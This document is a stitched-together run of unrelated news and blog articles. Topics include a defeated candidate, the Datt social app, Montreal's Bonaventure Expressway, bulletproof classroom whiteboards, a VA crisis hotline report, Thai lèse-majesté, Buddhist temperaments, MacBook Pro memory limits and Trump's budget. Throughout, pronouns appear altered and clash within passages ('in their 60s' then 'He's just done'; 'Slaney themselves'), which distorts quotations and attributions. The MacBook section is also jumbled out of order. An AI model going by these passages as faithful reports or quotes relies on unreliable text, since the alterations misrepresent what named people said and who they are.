Westland is in their 60s but was seeking to start a third career as a parliamentarian three years ago. After their loss, the culmination of 19 months of campaigning while business went on without him, they found they couldn't go back to life as a consultant and retired. He's just done. Except for the twin brands — of partisanship and loserdom — they feel they now carries. Even though they lost, their friends and colleagues associate them forever with the actions of their party, which they can either disown or defend but not ignore.
Their current project is trying to get their account of their campaign published, but you can read it at www.runningforparliament.com. Then find a losing candidate, whose exhaustion is probably wearing off around now, and deliver that hug.
dreevely@ottawacitizen.com
twitter.com/davidreevely
Bitcoin proponents have been talking about using the blockchain to decentralize everything from social media to the entire Internet for a few years now, and one of the projects that is attempting to take some action in this area is Datt. Datt is the brainchild of former Reddit Cryptocurrency Engineer Ryan X. Charles, who originally thought they were going to be able to work on decentralizing the social media platform during their time at the company.
Charles was able to generate a lot of hype around the concept of a decentralized, Bitcoin-powered alternative to Reddit in a Medium post and our interview from earlier this year, and they have been working on a working implementation of this idea over the past few months. In a recent presentation at a SF Bitcoin Meetup, Charles noted that an early, prototype version of the app should be available in November, while a public release may happen as early as March.
The Current Status of Datt
Before getting into possible release dates for Datt during their talk, Ryan X. Charles provided the audience with an update on the current status of the project. Charles did not have a working prototype to share with the audience, but they let it be known that the app is “75 percent finished.” They also added:
“There is an actual app with an interface and stuff, so you can create a new identity but it's too unworking to demo.”
As of now, Charles is taking care of the majority of the development work for Datt (as both a company and an open-source project). Anyone wanting to assist with the development process can visit the Datt GitHub page.
Early Release in November
When it comes to an actual release date for Datt, it seems that there could be a usable application available for download sooner than most expected. Charles noted that an early version of the software will be available in November:
“The goal is in November we'll launch an invite-only prototype, of course open source — you can download it and run it. But I'll specifically email some people and try to get feedback at that point once it's actually usable enough that people can understand how it really works.”
This early prototype of Datt will give everyone interested in the project an opportunity to play around with a few ideas and try to figure out the direction the platform should take. What Datt will eventually become is still an open-ended question, and it's possible that it will look quite different from Reddit when a release becomes available to the general public.
Public Release in March
Although Charles did not directly discuss a timeframe for a full public release, one of their slides did mention March as a “realistic goal for a ‘public launch.'” Although all aspects of Datt will need to be refined before the eventual launch of the app, there does seem to be an active community of interested parties who want to see this idea come to fruition as quickly as possible. Charles also mentioned March 14 as a possible launch date for Datt in a recent blog post.
Datt is a unique project in that it's unclear how the end goal of financially incentivized social media will be achieved. Perhaps the application will never become a widely-used application for sharing content, but there's also a chance something like Datt could eventually become a powerful publishing tool for directly connecting content creators with their audiences.
Jean Drapeau built it in 1966 to link the Champlain Bridge and downtown in time for Expo 67.
Fifty years later, Montreal's current mayor, Denis Coderre, is demolishing part of it to create a signature new entryway to the city in time for Montreal's 375th birthday next year.
Montreal started tearing down its portion of the elevated Bonaventure Expressway this week, promising to replace it with two boulevards with a series of green spaces between them, by September 2017.
The Bonaventure was built at a time when cars were at the centre of city planning, Mayor Coderre said Wednesday. Today, the focus is also on public transit and making cities more walkable, they said.
The roadwork is causing traffic headaches but “the sacrifices will be worth it,” Coderre added. “At the end of the day, we will be proud of our city because this is going to be a hell of a boulevard.”
Here's what you need to know about the $142-million project:
Location
Ottawa owns the portion of the Bonaventure between the Champlain Bridge and the Lachine Canal. The city of Montreal owns the rest — from the canal to downtown, which is the focus of this project. The highway drops to ground level by the time it turns into Robert-Bourassa Blvd. (formerly University St.). Parallel to the highway are Duke and Nazareth Sts., which acted as service roads.
Roadways
Before it was closed for demolition on July 1, about 25,000 drivers per day used the elevated Bonaventure, with a peak of 4,500 per hour during morning rush hour. About 1,000 buses use the highway every morning, and another 1,000 every afternoon, mostly shuttling South Shore residents to and from downtown Montreal.
Under the old configuration, there were 11 lanes — six highway lanes, plus two lanes on Duke and three on Nazareth.
Under the new set-up, there will be only nine lanes — four on northbound Duke, and five on southbound Nazareth.
But the city says that won't cause congestion. It's counting on an “intelligent transportation system” that will let the city adjust the timing of traffic lights according to traffic conditions, said Pierre Sainte-Marie of the city's planning department. If South Shore-bound traffic builds up after a night event at the Bell Centre, for example, the traffic lights can be adjusted accordingly.
“The traffic conditions will be totally acceptable,” Sainte-Marie said.
A proposed new light rail transit system linking downtown with the South Shore, Trudeau Airport and the West Island could also reduce car and bus traffic in the area, the city says. The section of the LRT linking the Champlain Bridge and Central Station would run parallel to the new wider boulevards.
“We're redefining the way that you're getting to the city,” Coderre said.
Pedestrians
A series of green spaces will fill in much of the area freed up by the demolition of the elevated highway between the Lachine Canal and Notre-Dame St. Trees, benches, flowers and paths will greet users in the new public spaces, which are being touted as a link between Griffintown, Old Montreal and downtown.
A 10-metre tall sculpture by Spanish artist Jaume Plensa will be installed at Wellington, between Duke and Nazareth.
Sidewalks on Duke and Nazareth are being widened from an average width of about 1.5 meters wide to seven meters. Trees will be planted along the sidewalks to provide shade and act as “psychological barriers” between pedestrians and cars.
Bike paths
East-west bike lanes will go on Ottawa and William Sts. and a link to the Lachine Canal bike path will be built. But the city has still not decided whether a north-south bike path will be incorporated into the project.
Timeline
Workers are operating heavy machinery that's chipping away at either end of the 800-metre-long elevated highway. They're at it Monday to Saturday, 6 a.m. to 6 p.m.
The city says demolition will be completed in September, and the new roadways — including new links to the Ville-Marie Expressway — should be completed by the end of the year. Next year, the city will work on landscaping the new parks, with the entire job finished in time for a September 2017 inauguration.
“We're on budget and on schedule,” Sainte-Marie said.
ariga@postmedia.com
twitter.com/andyriga
Getty Images / Getty Images Woman writing mathematical equations on whiteboard, close-up
One college has decided to put its money where its mouth is when it comes to protecting its students against school shootings.
The University of Maryland Eastern Shore (UMES) recently announced that it would purchase 200 bulletproof whiteboards from armor manufacturer Hardwire LLC. The 18-inch by 20-inch portable drawing boards, which also come in blue, green and pink, are able to absorb “multiple magazines of ammunition from any handgun or shotgun without ricochet or injury,” and retail for $299 each.
According to Hardwire owner George Tunis, the point of the boards is to provide teachers a way to protect students in the event of a school shooting. As of last year, 297 people have been killed in school shootings since 1980; an average of roughly 9 murders each year.
While rare, a recent spate of mass killings at educational institutions has drawn national attention to the issue of school violence. A 2012 shooting at Sandy Hook Elementary School in Newtown, Connecticut, left 20 children and six adults dead, and a 2007 attack at Virginia Tech killed 32.
“When Sandy Hook happened … a light bulb went off that it's really the teachers and administrators [that need protection],” Tunis told the Baltimore Sun. “Those brave souls were trying to close the gap and get to the shooter and stop him, but they didn't have anything that could stop the bullets along the way.”
UMES President Juliette B. Bell echoed these sentiments to the Sun, warning that the University, which has never experienced a shooting incident, must still ready itself for the unimaginable. “Being able to respond accordingly is very important,” said Bell. “It's all about being prepared.”
While UMES is the first university to embrace bulletproof whiteboard technology, it is not the first school to do so. Hardwire reports that it has sold the product to over 100 schools in five states, and an increasingly large industry has grown around marketing protective gear to schools.
The company also sells bulletproof clip boards (available in white, black, and camouflage), as well as a bulletproof insert that can be placed in a child's backpack. For $1499, Hardwire sells a bullet-stopping cover that can be affixed to a classroom door.
Another company, Elite Sterling Security, also sells bulletproof backpack inserts as part of its line of “Children's Items.” Other products include a child-sized bulletproof vest, and an insulated winter vest with bulletproof protection hidden inside. The field has grown competitive enough that a local news station recently tested two competing backpack inserts to see which version performed better.
The technology may be gaining popularity because it offers a defensive alternative to parents and school districts looking for new ways to protect against school shootings. The NRA has advocated arming teachers as a method of preventing future Newtown-like tragedies, but their suggestions have come under fire, with some accusing the plan of “turning schools into prisons.”
Jon Hendren was supposed to talk to HLN about Edward Snowden's decision to join Twitter, but instead referred to the fictional character
An internet prankster booked to talk about Edward Snowden on a US news channel instead spent the entire interview referring to Edward Scissorhands, with the anchor seemingly oblivious.
Comedian Jon Hendren was booked by US channel HLN to talk about Snowden's decision to join Twitter, but took the opportunity to raise the plight of the character played by Johnny Depp character in Tim Burton's 1990 film.
“Jon, Twitter shut down Isis's account. Why do you think Snowden is any different?” host Yasmin Vossoughian asked.
“He's been isolated for so long,” said Hendren. “We should listen to what they say.
“To say that they couldn't harm somebody with what they did, they could, absolutely, they could,” they continued. “But to cast them out, to make them invalid in society simply because they have scissors for hands, I mean, that's strange. People didn't get scared until they started sculpting shrubs into dinosaur shapes and whatnot.”
The HLN host continued undaunted, and brought the conversation back to the former NSA analyst. “Now, Snowden's living in Russia,” Vossoughian said. “Some people say it's hypocritical that Snowden has asylum in Russia. Russia has a lot of human rights violations.”
“Casting them out is completely wrong,” Hendren replied. “We're treating them like an animal, somebody who should be quarantined and put away. Just because they were created on top of a mountain by Vincent Price, and incomplete. With scissors for hands and no heart.”
“But what about the choice they made to live in a country like Russia?” the interviewer persisted.
“I mean, where else is they going to go? You know?” Hendren asked.
“We cast them out. We got scared when they poked a hole in a waterbed with their scissor fingers, and that was unreasonable of us.”
This week a new green and gold standard has been set for patriotic ice cream flavours. In other words: time to push on Bill, do you know how fucking weird and unnecessary it is to chew gum directly after you've eaten ice cream? Seriously.
To celebrate the best time of the year in the best country on the planet, Streets Ice Cream – emblematic of wet hot Australian summers ever since buying the naming rights to Brisbane's largest toddler urine catchment – has for a limited time only released green and gold versions of its Paddle Pop and Golden Gaytime ice cream flavours. For the next few weeks, the same flavours you know and love (rainbows and happiness, respectively) will be rendered in green and gold ice cream and look something ike this:
The Aussie creams, dubbed the Green & Golden Gaytime and Paddle Pop Aussie Rainbow, are available now at all good convenience stores.
Get it into ya.
Through the 2014 NFL Draft, which will be held in New York, NY from May 8-10, Florida Gators defensive back Jaylen Watkins will be keeping you up-to-date on their Path to the Draft with exclusive blog entries here at OnlyGators.com.
Florida's third-leading tackler with 52 takedowns last season, Watkins played safety for the Gators after being primarily used as a cornerback – the position they will play as a professional – during their first three years. Watkins started 28 of the 48 games in which they participated but saw the field for starter's minutes in many of those other contests.
Watkins's 11th entry covers their final workout, return home and plans for the draft.
Before I was able to leave Gainesville, I had to stick around last weekend for one more private workout. My Achilles felt great and did not give me any issues, so I definitely think I reassured them that I am healthy entering the draft. They wanted to see me plant and drive on my ankle because I could not do that well at the Pro Day, but the scouts and defensive backs coach were both pleased with how I performed last Friday.
Even though I left town, my lease runs through December and I am thinking about keeping my apartment long-term. I like Gainesville and I could definitely see myself coming back, especially during the offseason.
On my way home to Fort Myers, Florida, I stopped off in Orlando to see my dad and some other members of my family. I was in Gainesville for so long, flying around and everything, that I took the time to just relax and catch up with all of them. I finally got home Sunday afternoon and have really been taking it easy.
Outside of teams calling me to check my contact information for draft day, things have been quiet overall. There are a pretty good number of teams that have expressed serious interest in me and think I fit what they are trying to do. I would say maybe 10-12 teams really like how I'm playing and think I can help them this season.
I believe I have a solid mindset entering the draft. If you worry about too much – when you'll be picked and where you'll be drafted – it will drive you crazy.
Wherever I get drafted, I just hope it schematically is the best fit for me because that provides the opportunity for me to succeed somewhere long-term. It would probably be better to be selected later by a team that is a perfect fit than early somewhere else with a system that I cannot succeed in as easily.
The Philadelphia Eagles and Washington Redskins are two teams where I feel like their systems fit me very well. A number of other teams I met with – outside of all the ones I detailed here – asked that I not talk about our meetings, so I have to respect those requests. You will some additional information here on OnlyGators.com if one of those teams winds up selecting me.
My plans for the draft are just like me, very low-key. I will be watching just like every other year, probably at home with some family and friends.
It's going to be a little more interesting this year. [Laughing] It will be like a normal draft day, but it will be cool to see some guys I played with at Florida, trained with for the draft in South Florida, or worked out with during high school camps, the Army All-American game, the Senior Bowl and during the NFL Combine.
As a four-year player, I have gone through the same process as many of these guys and we are all reaching this point together, even if the journey was different for each of us.
I do not have any plans for after I get picked. I'm sure I will go out to dinner or hang out with friends and celebrate. But I'm not one to go out to the club and get VIP. I'm more laid back than that.
I'm ready for Thursday. I want to see where my brother [Clemson wide receiver Sammy Watkins] gets drafted. Thursday is also a big day for me to see how many cornerbacks get drafted in the first round. It's time for it to hurry up and get here.
I'm excited. I'm anxious.
You cannot really complain about being drafted. I think a lot of people get the wrong idea of, “I don't want to get drafted by this team” or “I don't want to be drafted late.”
We're going to be drafted. That's a big opportunity. And I'm ready for it.
Go Gators,
PREVIOUS ENTRIES
PART I – Post-college training
PART II – Senior Bowl preparation
PART III – Senior Bowl participation
PART IV: – Injury and rehabilitation
PART V: – NFL Combine preparation
PART VI: – NFL Combine participation I
PART VII: – NFL Combine participation II
PART VIII: – Returning to Gainesville, Pro Day preparation
PART IX: – Pro Day participation
PART X: – Team visits
PART XI: – More team visits, Sammy Watkins
Please enable Javascript to watch this video
RICHMOND, Va. -- At least two statues that honor Civil War icons were defaced on Monument Avenue Thursday morning as protest against newly elected president Donald Trump broke out around Richmond.
Police are looking for the person or people who spray-painted the Jefferson Davis and Matthew Fontaine Maury statues with the words "Your vote was a hate crime."
Davis was the President of the Confederate States of America during the Civil War. Maury served in the U.S. Navy, but later joined the Confederacy when the Civil War started.
The vandalism came the same night as hundreds of people marched through the streets of Richmond, protesting Trump.
City crews were dispatched to clean up the monument graffiti.
Anyone with any information about the vandalism was asked to call police.
This is a developing story. Submit a news tip here.
A suicide hotline operated by the Department of Veterans Affairs allowed crisis calls to go into voicemail, and callers did not always receive immediate assistance, according to a report by the agency's internal watchdog.
The report by the VA's office of inspector general says calls to the suicide hotline have increased dramatically in recent years, as veterans increasingly seek services following prolonged wars in Iraq and Afghanistan and the aging of Vietnam-era veterans.
The crisis hotline - the subject of an Oscar-winning documentary - received more than 450,000 calls in 2014, a 40 percent increase over the previous year.
About 1 in 6 calls are redirected to backup centers when the crisis line is overloaded, the report said. Calls went to voicemail at some backup centers, including least one where staffers apparently were unaware there was a voicemail system, the report said.
Hotline callers "made numerous complaints of long wait times for responders, being put 'on hold' or calls 'not being put through' to a responder," the report said.
Sen. John McCain, R-Ariz., said they were deeply saddened and disappointed by the IG report.
"The VA's failure to help our most vulnerable veterans is not only unacceptable, but it is shameful," McCain said. "The VA's inability to run a call center and deal with increasing demand has put our nation's veterans at greater risk."
Deputy VA Secretary Sloan Gibson said the agency agrees with the report's recommendations and is working to modernize the crisis hotline, located in Canandaigua, New York, to better serve veterans. The VA is hiring more staff and has implemented staggered shifts to increase staffing during peak call times from 10 a.m. to 10 p.m., Gibson said.
"We are improving our ability to be more available when our veterans need help the most," said Gibson, who visited the hotline center twice last year.
Upgrades are planned in the next year to provide state-of-the art phone systems and greater work space for staff who answer crisis calls, Gibson said.
About one-fifth of all suicides in the United States are committed by veterans, and the VA has highlighted suicide prevention as a crucial area of concern. A law signed by President Barack Obama year requires the Pentagon and VA to submit to independent reviews of their suicide prevention programs and make information on prevention more easily available.
The law also offers financial incentives to psychiatrists and other mental health professionals who agree to work for the VA and assists military members as they transition from active duty to veteran status.
An HBO documentary highlighting the life-and-death drama of the VA suicide hotline won an Oscar last year. The film, "Crisis Hotline: Veterans Press 1" won for best documentary, short subject.
Paul Rieckhoff, CEO of Iraq and Afghanistan Veterans of America, an advocacy group that works with the call center, said they were disappointed by the IG's report.
"As the number of service members, veterans and their families reaching out to the Veterans Crisis Line continues to grow, the need for additional resources becomes more apparent," Rieckhoff said.
Formlabs makes powerful 3D printers that can make objects that look as solid and smooth as injection-molded parts. Now, however, they've added improved materials including a new gray material that is completely matte and reformulated for optimal printing and a ceramic material that can be fired like standard ceramics.
Further, they've launched Form X, an experimental toolkit for makers and engineers.
“We want to get innovative materials and research tools into the hands of those who wish to explore, improvise, and push the boundaries of what's possible with 3D printing and on the Form 2,” said David Lakatos. “Ceramic Resin is perfect example with Form X. Ceramic Resin is one of the most novel areas in material science to explore in 3D printing right now. Ceramic 3D printing allows for the creation of structures and complex geometries not possible with traditional ceramic fabrication techniques.”
I spoke with David about the new resins and systems and you can see some of the parts they've printed in the video above.
Consensual sexual activity between individuals of the same sex.
Marriage and marriage recognition between two people of the same biological sex and/or gender identity.
Legal recognition of sex reassignment by permitting a change of legal gender on an individual's birth certificate.
The ability for same-sex couples to legally adopt a child.
Prohibition of discrimination based on sexual orientation and/or gender identity.
Prohibition of discrimination based on sexual orientation and/or gender identity when applying for housing or discrimination by landlords / property owners.
Prohibition of discrimination based on sexual orientation and/or gender identity in employment, including hiring, promotion, termination, harassment, etc.
The ability for homosexuals to serve in the military and be open about their sexuality.
The difference between legal age of consent for homosexual sex and heterosexual sex.
The ability for MSMs (men who have sex with men) to donate blood or tissue for organ transplants. A deferral period refers to a waiting time before a man can donate after having sex.
Legal status of conducting sexual orientation changing therapy ("ex-gay" therapy)
The Equality Index is an experimental rating to help visualize the legal rights and public attitudes towards LGBT people in a given region.
Currently, the index only applies to written law — not necessarily practiced law — and only takes public opinion into account when data is available.
Galaxy, after winning two titles, must now deal with transition
With certain departure of David Beckham and possible departure of Landon Donovan, Galaxy is looking to fill one and maybe two designated player spots. Securing a Latin American player is the priority.
Which is why Leiweke and Arena began talking over off-season scenarios even before the Galaxy began its victorious playoff run. They started preparing for Beckham's MLS retirement during the summer, weeks before it was announced publicly. What Donovan will do is less certain; the player, who has a year left on their contract, says they don't know whether he'll play next season.
"There's little doubt in my mind that we're going to have some transition here," said Leiweke, president of AEG, the global sports and entertainment company that owns the Galaxy. "We'll play it out, see what happens. But you make good decisions by being prepared."
Because after winning consecutive league titles with David Beckham and Landon Donovan, the team must now figure out a way to win without one and possibly both players.
The Galaxy celebrated Saturday's MLS Cup victory deep into Sunday morning. But when Coach Bruce Arena and Tim Leiweke, the team's chief executive, awoke later that day, the countless champagne toasts weren't the only things that had their heads spinning.
That leaves the team with one, maybe two, designated player spots — exemptions to the league's frugal salary cap that allow teams to sign big-name stars to MLS contracts — and Leiweke has been hard at work on filling those. Last month, the Galaxy was in talks with former FIFA world player of the year Ronaldinho, but last week the 32-year-old signed a contract extension with their Brazilian club, Atletico Mineiro. So Leiweke has turned their attention to Kaka, another former world player of the year from Brazil who currently plays for Real Madrid.
Chelsea's Frank Lampard has also reached out to the Galaxy, but Leiweke said the team's new contract with Time Warner Cable and its Spanish-language channel make the signing of a Latin American player a priority.
"Look, if Wayne Rooney wants to come, we'll make an exception. But the reality for us right now, our thinking, is … iconic players that have a special relationship with the Hispanic community," they said.
The Galaxy's third designated player, striker Robbie Keane, is under contract for two more seasons with an option that could keep them here through 2015. But squeezing the rest of the roster within the league's complicated salary budget of roughly $4 million for next season will be tough.
Midfielders Mike Magee and Juninho — on loan from São Paulo — will be out of contract at the end of the year, as will goalkeeper Josh Saunders, whose future with the team is further clouded by the Galaxy's interest in trading for Chivas USA keeper Dan Kennedy.
The entire backline of Omar Gonzalez, A.J. DeLaGarza, Todd Dunivant and Sean Franklin is signed for another year, although the team expects Gonzalez, the MLS Cup most valuable player, to draw loan interest from several European clubs. Midfielder Marcelo Sarvas and forward Edson Buddle are also signed, and midfielder Christian Wilhelmsson has an option for next season that may prove too expensive for the Galaxy to pick up. Unlike other pro leagues, MLS' strict salary rules do not allow teams to pay a tax for violating the payroll cap.
"My guess is we're going to have a lot of questions," Arena said. "It's never smooth, although you'd like it to be. There's always another issue that comes along and makes things difficult. And I'm sure we're going to have it again this year."
The Galaxy will hold a public victory celebration Monday at 7 p.m. in the Home Depot Center's tennis stadium. The entire roster, including Beckham and Donovan, is expected to participate.
kevin.baxter@latimes.com
AP Union protesters have descended on Michigan's Capitol to protest a bill that would expand the role of emergency financial managers tasked with reviving the state's struggling cities and schools, Reuters reports.
The legislation, proposed by Republican Gov. Rick Snyder, would give state-appointed EFMs greater authority to repair city and school finances, including nullification of employee union contracts. The emergency managers would also have the power to dissolve local governing bodies and impose new union agreements.
The state's Republican-controlled Senate is expected to pass the bill today.
Critics of the bill say it's a thinly-veiled attempt to curb the power of public-sector unions, akin to measures that have drawn union ire in Wisconsin, Ohio and Indiana. Michigan union supporters claim sharp cuts in school funding and municipal revenue sharing will push more cities and school districts into financial distress, giving the newly-empowered EFMs unprecedented oversight of public employee unions across the state.
Detroit Public Schools is currently the only school district under emergency management.
State Treasurer Andy Dillon last month warned that dozens of Michigan communities could soon face major financial difficulties. The state treasurer's office has been training EMFs to prepare for the expected onslaught of muni financial crises.
This article is over 2 years old
Thailand opens investigation into BBC for alleged insult of new king
Thailand has opened an investigation into the BBC's local language service for alleged defamation and blocked access to an online profile of the country's new king, less than a week after they succeeded to the throne.
The biography was published on Friday by BBC Thai a day after King Maha Vajiralongkorn accepted the title following the death of their father, Bhumibol Adulyadej, on 13 October.
Thailand's lèse-majesté laws Strict lèse-majesté laws make it a crime to criticise, defame or insult members of the royal family. In practice, this means open discussion or critical reporting about the royal family is considered illegal. The military junta, which seized power in 2014, has been criticised for using the law – which can see people jailed for up to 15 years on each count – to stifle opposition. In 2015, a man was jailed for 30 years over six Facebook posts and the local printer of the New York Times refused to publish an edition with a story on the king.
General Prawit Wongsuwan, deputy prime minister and minister of defence, said that authorities were investigating whether the article breached the country's strict lèse-majesté (wounded majesty) laws.
Around 10 police officers visited the BBC office on Tuesday but found it closed. They reportedly helped themselves to a delivery of Yakult milk drink left at the door before leaving. Members of the army arrived later to ask about the police visit.
The BBC did not provide a comment for this article.
Anyone who “defames, insults or threatens” a member of the Thai royal family can face three to 15 years in jail on each charge. Under the law, the government is compelled to investigate any case raised by a member of the public.
The BBC profile explained how the new king was educated in Thailand, the UK and Australia, and flies their own Boeing 737 when travelling abroad.
It said questions were raised about their fitness to succeed to the throne when they were formally titled as heir in 1972, adding that they do not command the same level of respect their father built during seven decades on the throne.
When attempting to access the article in Thailand, a message appears from the ministry for digital economy and society, announcing that the website contains “inappropriate information”.
Following its publication in Thai, angry comments were posted on Facebook including physical threats and the location of the BBC's Bangkok office.
On Saturday, anti-government activist Jatupat Boonpattaraksa was arrested for sharing the article on their Facebook page. They were released on bail on Sunday.
The ruling junta, which took power in a military coup in 2014, positions itself as a defender of the monarchy and has sought to appease ultra-royalist factions by pursuing anyone deemed to have breached lèse-majesté.
Last year, military courts jailed two people under the law, one for 30 years and the other for 28, for posts on Facebook.
The coronation of the new monarch will be held some time after Bhumibol's cremation next year.
In the Buddhist psychology, there are three personality types described. Not everyone fits neatly into one of the three slots of course; in some ways we are all a mixture of each of the three. But sometimes there is a constellation of tendencies that would have one say, “Oh, I'm mostly that type.”
We can learn a lot about different aspects of ourselves as we explore these personality types — perhaps, most importantly, that these are impersonal tendencies that we don't have to rigidly identify with or have defined us. Understanding these conditioned tendencies helps us see the tremendous relativity happening all of the time. For example, in any particular situation, some people will tend to look on the bright side, some will naturally focus on what is wrong, and some will get quite confused. These three responses conform to the three main character types in Buddhist psychology: the greedy type, the angry type, and the deluded type.
To refer to these types isn't pejorative. We are all conditioned in some way or another, and most importantly, through the power of awareness we can learn not to be limited by our conditioning, whatever it might be. Each type has a purified and unpurified form, which means there is a jewel embedded within that set of tendencies. Through mindfulness we can extract it and transform. The problem is not the tendency, the problem is fixation — when we pretty much have a set way of reacting to everything. Mindfulness opens up a world of options to us.
The first type is the greedy type. This doesn't at all mean you are a greedy person. This type is described as the kind of person who walks into a room and their eye falls on what they like, what they find lovely or desirable, while they overlook what may be worn away, or damaged, or falling apart. This is the person who, in a meeting when a dilemma is presented, will say “It will all work out, “ while you sit there thinking, “How will it all work out?”
The Visuddhi Magga, a fifth century commentarial work in the Theravadan Buddhist tradition, says of the greedy type:
“They seize on trivial virtues, discount genuine faults, and when departing, they do so with regret as if unwilling to leave.”
In the purified form, that tendency towards only wanting to see the pleasant gets transformed into a willingness to draw near to all aspects of life, to experience life more fully, not holding back or hiding.
The angry type is quite different. They might not literally be an angry person, but their tendency is to focus in on what's wrong, what's challenging or obstructing in getting what one wants. This type of person is described as one who goes into a room and their eye falls upon what is displeasing to them — right away they will notice the burn mark in the carpet or the disgruntled expression on a colleague's face.
This is the type of person who is in a meeting when an opportunity is presented, and their very first comment will be a hasty, “It won't work.” You might be sitting there thinking, “Why not? Why couldn't it work?” The Visuddhi Magga describes this type of person in this way:
“They pick out trivial faults, discount genuine virtues, and when departing, they do so without regret as if anxious to leave.”
In the purified form this gets transformed into discerning wisdom. That tendency to mainly see what's wrong also contains an aspect of not staying on a superficial level of perception, being ready to look deeper than many others are inclined to, and being willing to honestly recognize what is unpleasant or unwelcome.
The deluded type (my type, emphatically) is somewhat muddled or spaced out. If something goes wrong, the great temptation is to take a nap, tune it out. If something is wonderful, it might not be fully taken in. This type tends to be mellow, but without a lot of acuity of perception, unless trained to clarify and refine attention. The Visuddhi Magga says:
“When one of deluded temperament sees any sort of visible object, they copy what others do. If they hear others criticizing, they criticize; if they hear others praising, they praise, but actually they feel equanimity in themselves, the equanimity of unknowing!”
This is the type who in a meeting will be slow to process the dilemma or opportunity, and not quite sure right away how they feel about it. In the purified form delusion becomes a true equanimity, not based on missing fine details or being in a cocoon of withdrawal from engagement with life, but a full on sense of balance that is combined with clear and precise attention.
Just for fun, I'm including this passage from the Visuddhi Magga, which talks about how each type tends to walk, eat, sweep a path, etc:
“When they sit or they lie down to go to sleep, one of greedy temperament spreads their bed unhurriedly, lies down slowly, composing their limbs and, they sleep in a confident manner. When woken, instead of getting up quickly, they give their answers slowly as though doubtful. One of angry temperament spreads their bed hastily anyhow. With their body flung down, they sleep with a scowl. When woken, they get up quickly and answer as though annoyed. One of deluded temperament spreads their bed all awry and sleeps mostly face downward with their bodies sprawling. When woken, they get up slowly, saying, ‘Huh?'”
Does any of this sound familiar? We all probably know that first type of person, who has a hard time facing difficulties in situations, and might almost insist on ignoring them; they just want everything to be nice all of the time. We all probably know that second type of person, whose mind seems to seize on what is wrong in any situation, sometimes pointing out problems everyone else has missed (but not necessarily thinking they will be resolved!). And we all probably know that third type of person, who easily gets confused, uncertain about what they actually feel or perceive, somewhat dependent on the views of others.
We know people like that, and very likely we can find some of our own traits in this typology. Remember that for whatever conditioning, mindfulness is the alchemical agent, with the capacity to transform it all.
Schiller: The MacBook Pro uses 16GB of very fast LPDDR memory, up to 2133MHz. To support 32GB of memory would require using DDR memory that is not low power and also require a different design of the logic board which might reduce space for batteries. Both factors would reduce battery life.
To put more than 16GB of fast RAM into a notebook design at this time would require a memory system that consumes much more power and wouldn't be efficient enough for a notebook. I hope you check out this new generation MacBook Pro, it really is an incredible system.
Apple have been using LPDDR for several generations of their notebooks, and it's part of the way that they get very long standby time on them. Switching to DDR4 would drastically decrease it from the 30 days of standby time that they get now to less than one week. With DDR4 they'd have produced a notebook that would have a completely drained battery if it was at 50% charge and you closed the lid and left it for a few days. Not only would that be annoying, but by running the battery flat often it would end up damaging a percentage of their batteries because they'd frequently get 100% discharged, which puts a lot of stress on them, and sometimes even kills them.
Apple marketing chief Phil Schiller has allegedly responded to an email from software developer Ben Slaney to further clarify why the new MacBook Pro maxes out at 16GB of RAM, noting that supporting 32GB of RAM would require a different logic board design which might reduce space for batteries.Slaney themselves wrote an article explaining how the new MacBook Pro uses a low power, enhanced version of RAM called LPDDR3E, which maxes out at 16GB. To achieve up to 32GB RAM would have required using DDR4 RAM, but low-power LPDDR4 RAM is not supported by the Intel processors powering the late 2016 models.Using the iStat Menus tool, Slaney determined that, under normal conditions, the LPDDR3E RAM uses 1.5 watts of power. In comparison, they said the notebooks would use about 3-5 watts if they were using DDR4 memory, although this estimate is rather loosely based on tests of DDR4 RAM on Windows-based notebooks.Slaney said the 2-5 watts saved translates to 10% of overall power usage being dedicated to RAM versus 20-30% that would be required for DDR4 RAM, which, if accurate, helps justify Apple's power versus performance tradeoff.Schiller previously addressed these power concerns in an earlier comment:Apple's decision is even more justified when considering background power draw, or the energy a notebook uses to go back into sleep mode after regular usage. Slaney said this figure is estimated to be about 50% of overall power draw on an average system when using DDR4 RAM, but only 20% when using LPDDR3 RAM.Moreover, the new MacBook Pro would get less than 7 days of standby time if it used DDR4 RAM, compared to 30 days with LPDDR3E RAM, they said.The rest of the article reflects upon poor battery life in several Windows-based notebooks with 32GB RAM, part of which can be blamed on the FAA's 100-watt-hour limit on notebook batteries brought on airplanes. Why the MacBook Pro is limited to 16GB of RAM " on MacDaddy
One of the enduring frustrations of Donald Trump's 2016 campaign and presidency is the fact that they somehow have managed to cast themselves as a “populist” despite being a flagrantly oligarchical representative of America's super-wealthy elite. While they spit acid about Muslims and immigrants and trade deals, they back policies that benefit the rich while screwing over everyone else.
This is true of Trump's tax proposals, which redirect wealth from the poor to the ultrarich. No one who supports repealing the estate tax can credibly be called a “populist.” It's also true about their health care proposals, which slash benefits for low-income people while cutting taxes on the well-to-do. And it looks like this pattern will hold with respect to Trump's forthcoming budget proposal, in which the “populist” president will ask for a big hike in defense spending while inflicting painful cuts on social programs.
Advertisement:
The centerpiece of the Trump budget plan, according to early reports, is a $54 billion increase in military spending. The administration insists that it's going to cover the costs of a big military buildup with cuts to other programs. This typical of how Republicans' budget-making process usually plays out: They have very clear ideas for where they want to redirect funds (to the military or rich people) but are determinedly vague when it comes to explaining precisely where that money will come from. It has to come from somewhere, and since tax increases are forever off the table, Republicans usually cite some combination of economic growth and unspecified cuts to discretionary spending to explain how their budget priorities will be paid for.
As the Washington Post has reported, the Trump White House offered up foreign aid as one budget item it plans to cut deeply. CNN noted that the administration is also considering slashing the Environmental Protection Agency's budget as much as 25 percent. Taken together, those two cuts wouldn't come close to covering the cost of a proposed $54 billion military spending increase. The EPA's total annual budget is only about $8 billion. Foreign aid, meanwhile, will total about $36 billion for fiscal year 2017, so even if the White House plans to trim that number, say, 50 percent, it still has a lot of ground to make up.
The rest of the money would have to come from other programs. As the Center on Budget and Policy Priorities has noted, this could mean slashing staff at the Social Security Administration or reductions for Head Start and federal housing assistance. Republicans are generally fine with cuts to the safety net, which would be necessary to make the budget math work. But GOP policymakers are not eager to talk about them because of the potential for political backlash.
This focus on foreign aid and the EPA is a big con job that the White House is pushing to make its budget seem less regressive than it actually is. The EPA has been singled out as a job-killing bogeyman and the poster child for out-of-control regulation that harms the economy. Trump and the rest of the GOP would have voters believe that restraining the agency will magically revive the sputtering coal industry in Appalachia. It won't. Gutting the EPA's budget will accomplish little beyond hampering the agency's ability to fulfill its mandate.
